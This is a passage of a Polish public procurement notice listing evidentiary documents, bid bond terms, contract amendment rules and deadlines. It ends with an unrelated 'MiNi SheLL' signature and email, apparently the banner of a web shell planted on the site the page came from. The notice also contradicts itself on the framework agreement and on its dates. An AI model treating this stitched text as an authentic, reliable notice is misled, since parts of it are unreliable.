SWZ.<br/>c) Okres ostatnich 3 lat liczy się wstecz od dnia w którym upływa termin składania ofert.<br/>d) Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług wykonywanych wspólnie z innymi Wykonawcami, wykaz<br/>dotyczy usług, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>e) Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 6 do SWZ – WYKAZ USŁUG.<br/>f) Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień<br/>zakończenia wykonywania usług, podając datę i kurs.<br/>g) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten z Wykonawców, który w<br/>imieniu wszystkich wykazywać będzie spełnianie warunku określonego w pkt XVII. ppkt 2 poz. 4) lit. a) SWZ.<br/>2) Wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych Wykonawcy usług w celu realizacji zamówienia wraz<br/>z informacją o podstawie dysponowania tymi zasobami.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)<br/>zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat,<br/>w zakresie art. 109 ust. 1 pkt 1 ustawy Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania<br/>z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że przed<br/>upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z<br/>odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>Uwaga:<br/>a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia,<br/>b) w przypadku Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedmiotowy dokument należy złożyć także<br/>w odniesieniu do tych podmiotów,<br/>2) zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub<br/>właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzający,<br/>że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 ustawy<br/>Pzp, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem<br/>składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia<br/>dokumentów potwierdzających, że przed upływem terminu składania ofert Wykonawca dokonał płatności należnych składek na<br/>ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych<br/>należności;<br/>Uwaga:<br/>a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składakażdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia,<br/>b) w przypadku Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedmiotowy dokument należy złożyć także<br/>w odniesieniu do tych podmiotów,<br/>3) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;<br/>Uwaga:<br/>a) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składakażdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia,<br/>b) w przypadku Wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej<br/>podmiotów udostępniających zasoby na zasadach określonych w art. 118 ustawy Pzp, przedmiotowy dokument należy złożyć także<br/>w odniesieniu do tych podmiotów.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Oświadczenia i dokumenty składane przez Wykonawców wraz z ofertą:<br/>1) oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp, o niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu, w zakresie wskazanym przez Zamawiającego;<br/>Uwaga:<br/>a) Treść i zakres wymaganego oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2 do SWZ.<br/>b) Przedmiotowe oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w<br/>postępowaniu, na dzień składania ofert, tymczasowo<br/>zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe.<br/>c) W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, przedmiotowe oświadczenie składa każdy z<br/>Wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje<br/>spełnianie warunków udziału w postępowaniu.<br/>d) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia,<br/>wraz z przedmiotowym oświadczeniem, także<br/>oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz spełnianie<br/>warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.<br/>2) zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na<br/>potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów – w przypadku Wykonawcy, który polega na<br/>zdolnościach lub sytuacji innych podmiotów.<br/>Uwaga:<br/>a) Zobowiązanie podmiotu udostępniającego zasoby potwierdza, że stosunek łączący Wykonawcę z podmiotami<br/>udostępniającymi zasoby gwarantuje rzeczywisty dostęp do tych<br/>zasobów oraz określa w szczególności:<br/>- zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>- sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby<br/>przy wykonywaniu zamówienia;<br/>- czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego Wykonawca polega w odniesieniu do<br/>warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje<br/>usługi, których wskazane zdolności dotyczą.<br/>b) Zobowiązanie należy złożyć zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 5 do SWZ.<br/>3) oświadczenie, o którym mowa w art. 117 ust. 4 ustawy Pzp, z którego wynika, które usługi wykonają poszczególni<br/>Wykonawcy – w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>Uwaga:<br/>a) Oświadczenie należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SWZ.<br/>b) Oświadczenie składają wyłącznie Wykonawcy wspólnie ubiegający się o udzielenie zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający żąda od Wykonawcy wniesienia wadium w wysokości:<br/>4 800,00 złotych (słownie: cztery tysiące osiemset złotych), Wadium wnosi się przed upływem terminu składania ofert i<br/>utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>2. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy NR 41 1010 1397 0005 3413 9120 1000<br/>Jeżeli wadium wnoszone jest w formie gwarancji lub poręczenia, o których mowa w poz. 2)-4), Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>Plik (oryginał gwarancji lub poręczenia, w postaci elektronicznej) należy złożyć wraz z ofertą za pośrednictwem Formularza<br/>do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu.<br/>3. Wadium będzie zwracane na warunkach określonych w art. 98 ustawy Pzp.<br/>4. Zamawiający zatrzyma wadium na warunkach określonych w art. 98 ust.6 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.2. W przypadku, o którym mowa w ppkt 1.1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i składają wraz z ofertą pełnomocnictwo.<br/>1.3. W przypadku wyboru jako najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający oświadcza, że może żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy<br/>regulującej współpracę tych Wykonawców.<br/>1.4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie<br/>umowy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Informacja o przewidywanych zmianach zawartej umowy w stosunku do treści oferty, o których mowa w art. 455 ust. 1 pkt 1<br/>ustawy Pzp:<br/>Rodzaj i zakres zmian, warunki wprowadzenia zmian:<br/>1) Zmiany wynagrodzenia:<br/>a) W przypadku zmiany stawki podatku od towarów i usług oraz podatku akcyzowego:<br/>- zmianie ulegnie kwota wynagrodzenia brutto określona w § 6 ust. 1 projektu Umowy stanowiącej Załącznik Nr 3 do SWZ,<br/>- zmiana wynagrodzenia nastąpi wyłącznie w stosunku do niezrealizowanej w dniu zmiany stawki podatku od towarów i<br/>usług oraz podatku akcyzowego części zamówienia,<br/>- do określonego w ofercie wynagrodzenia w odniesieniu do niezrealizowanej części zamówienia zostanie zastosowana<br/>obowiązująca na dzień dokonania zmiany stawka podatku od towarów i usług oraz podatku akcyzowego,<br/>- zmiana wynagrodzenia nastąpi o kwotę wynikającą z różnicy między dotychczasową, a nową stawką podatku od towarów i<br/>usług oraz podatku akcyzowego,<br/>b) W przypadku zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości<br/>stawki składki na ubezpieczenia społeczne lub zdrowotne:<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania przez Wykonawcę przedmiotu umowy, każda ze stron umowy w<br/>terminie 30 dni od dnia wejścia w życie przepisów dokonujących tych zmian, może zwrócić się do drugiej strony o zmianę<br/>wynagrodzenia z uwagi na wyżej wymienioną okoliczność,<br/>- obowiązek wykazania zmiany rzeczywiście ponoszonych kosztów z uwagi na wyżej wymienioną okoliczność należy do<br/>strony, która wystąpi z wnioskiem o zmianę wynagrodzenia, z zastrzeżeniem zapisów ppkt 6),<br/>- wartość wynagrodzenia ulegnie zmianie o różnicę w kosztach ponoszonych przez Wykonawcę w odniesieniu do<br/>niezrealizowanej części zamówienia jedynie o różnicę między kosztami ponoszonymi przez Wykonawcę z tytułu podlegania<br/>ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub<br/>zdrowotne dotychczas i po zmianie przepisów,<br/>4) Zmiany danych podmiotowych dotyczących Wykonawcy, lokalizacji siedziby biura Wykonawcy.<br/>5) Likwidacji lub rozwiązania firmy Wykonawcy.<br/>6) W celu dokonania zmian umowy, o których mowa w ppkt 1) lit. b) Wykonawca zobowiązany jest wystąpić do<br/>Zamawiającego z pisemnym wnioskiem o zmianę wynagrodzenia,<br/>przedkładając odpowiednie kalkulacje i dokumenty, w tym m.in. kopie umów z osobami, które bezpośrednio wykonują<br/>zamówienie, dokumenty/deklaracje ZUS:<br/>- potwierdzające zasadność i bezpośredni wpływ zaistniałych zmian na koszty wykonania zamówienia,<br/>- określające stopień w jakim zmiana, o której mowa w ppkt 1) lit. b) wpłynie na wysokość wynagrodzenia. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">drogą elektroniczną za pośrednictwem http://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-18 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.19.) Umowa ramowa: </h3> Umowa ramowa zawarta zostanie z jednym wykonawcą <h3 class="mb-0">8.20.) Przewiduje się ograniczenie liczby uczestników umowy ramowej: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.21.) Maksymalna liczba wykonawców, z którymi zamawiający zawrze umowę ramową: <span class="normal">1</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Informacje dotyczące ofert wariantowych, w tym informacje o sposobie przedstawiania ofert<br/>wariantowych oraz minimalne warunki, jakim muszą odpowiadać oferty wariantowe, jeżeli<br/>Zamawiający wymaga lub dopuszcza ich składanie:<br/>Zamawiający nie dopuszcza składania oferty wariantowej.<br/>2. Informacja o zastrzeżeniu możliwości ubiegania się o udzielenie zamówienia wyłącznie przez<br/>Wykonawców, o których mowa w art. 94 ustawy Pzp, jeżeli Zamawiający przewiduje takie<br/>wymagania:<br/>Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez<br/>Wykonawców, o których mowa w art. 94 ustawy Pzp.<br/>3. Informacje dotyczące walut obcych, w jakich mogą być prowadzone rozliczenia między<br/>Zamawiającym a Wykonawcą, jeżeli Zamawiający przewiduje rozliczenia w walutach obcych:<br/>Zamawiający nie przewiduje rozliczenia w walutach obcych.<br/>4. Informacje dotyczące zwrotu kosztów udziału w postępowaniu, jeżeli Zamawiający przewiduje<br/>ich zwrot:<br/>Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.<br/>5. Maksymalną liczbę Wykonawców, z którymi Zamawiający zawrze umowę ramową, jeżeli<br/>Zamawiający przewiduje zawarcie umowy ramowej:<br/>Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>6. Wymóg lub możliwość złożenia ofert w postaci katalogów elektronicznych lub dołączenia<br/>katalogów elektronicznych do oferty, w sytuacji określonej w art. 93 ustawy Pzp:<br/>Zamawiający nie dopuszcza możliwości złożenia ofert w postaci katalogów elektronicznych lub<br/>dołączenia katalogów elektronicznych do oferty.<br/>Ogłoszenie nr 2021/BZP 00117251/01 z dnia 2021-07-16<br/>2021-

Creat By MiNi SheLL
Email: jattceo@gmail.com